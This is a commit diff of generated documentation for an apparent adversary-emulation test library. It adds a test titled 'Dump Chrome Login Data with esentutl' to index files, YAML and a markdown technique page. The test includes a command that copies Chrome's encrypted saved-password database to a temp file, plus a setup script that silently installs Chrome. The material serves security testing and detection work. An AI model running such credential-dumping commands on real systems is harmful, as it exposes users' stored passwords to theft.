Generated docs from job=generate-docs branch=master [ci skip]

2023-12-04 18:35:28 +00:00
parent 966bf4b50d
commit 6607ee34b6
9 changed files with 135 additions and 2 deletions
@@ -1420,6 +1420,7 @@ credential-access,T1555.003,Credentials from Password Stores: Credentials from W
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
+credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,17,Dump Chrome Login Data with esentutl,70422253-8198-4019-b617-6be401b49fce,command_prompt
 credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -926,6 +926,7 @@ credential-access,T1555.003,Credentials from Password Stores: Credentials from W
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
+credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,17,Dump Chrome Login Data with esentutl,70422253-8198-4019-b617-6be401b49fce,command_prompt
 credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Unsecured Credentials: Private Keys,9,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Unsecured Credentials: Private Keys,10,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
@@ -2005,6 +2005,7 @@
  - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
  - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
  - Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
+  - Atomic Test #17: Dump Chrome Login Data with esentutl [windows]
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
@@ -1376,6 +1376,7 @@
  - Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
  - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
  - Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
+  - Atomic Test #17: Dump Chrome Login Data with esentutl [windows]
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
@@ -84857,6 +84857,42 @@ credential-access:
          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
        name: powershell
+    - name: Dump Chrome Login Data with esentutl
+      auto_generated_guid: 70422253-8198-4019-b617-6be401b49fce
+      description: |
+        This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
+        [Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: File path for login data dump
+          type: string
+          default: "%temp%\\T1555.003_Login_Data.tmp"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Chrome must be installed
+
+          '
+        prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
+          -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
+          {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
+          msiexec /i $installer /qn
+          Start-Process -FilePath "chrome.exe"
+          Stop-Process -Name "chrome"
+      executor:
+        name: command_prompt
+        command: 'esentutl.exe /y "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login
+          Data" /d "#{output_path}"
+
+          '
+        cleanup_command: 'del /f /q #{output_path} > nul 2>&1
+
+          '
  T1557.003:
    technique:
      modified: '2022-10-21T15:18:16.023Z'
@@ -69357,6 +69357,42 @@ credential-access:
          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
        name: powershell
+    - name: Dump Chrome Login Data with esentutl
+      auto_generated_guid: 70422253-8198-4019-b617-6be401b49fce
+      description: |
+        This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
+        [Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: File path for login data dump
+          type: string
+          default: "%temp%\\T1555.003_Login_Data.tmp"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Chrome must be installed
+
+          '
+        prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
+          -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
+          {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
+          msiexec /i $installer /qn
+          Start-Process -FilePath "chrome.exe"
+          Stop-Process -Name "chrome"
+      executor:
+        name: command_prompt
+        command: 'esentutl.exe /y "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login
+          Data" /d "#{output_path}"
+
+          '
+        cleanup_command: 'del /f /q #{output_path} > nul 2>&1
+
+          '
  T1557.003:
    technique:
      modified: '2022-10-21T15:18:16.023Z'
@@ -44,6 +44,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl

 - [Atomic Test #16 - BrowserStealer (Chrome / Firefox / Microsoft Edge)](#atomic-test-16---browserstealer-chrome--firefox--microsoft-edge)

+- [Atomic Test #17 - Dump Chrome Login Data with esentutl](#atomic-test-17---dump-chrome-login-data-with-esentutl)
+

 <br/>

@@ -897,4 +899,59 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at



+<br/>
+<br/>
+
+## Atomic Test #17 - Dump Chrome Login Data with esentutl
+This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
+[Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 70422253-8198-4019-b617-6be401b49fce
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | File path for login data dump | string | %temp%&#92;T1555.003_Login_Data.tmp|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+esentutl.exe /y "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /d "#{output_path}"
+```
+
+#### Cleanup Commands:
+```cmd
+del /f /q #{output_path} > nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Chrome must be installed
+##### Check Prereq Commands:
+```powershell
+if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
+Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
+msiexec /i $installer /qn
+Start-Process -FilePath "chrome.exe"
+Stop-Process -Name "chrome"
+```
+
+
+
+
 <br/>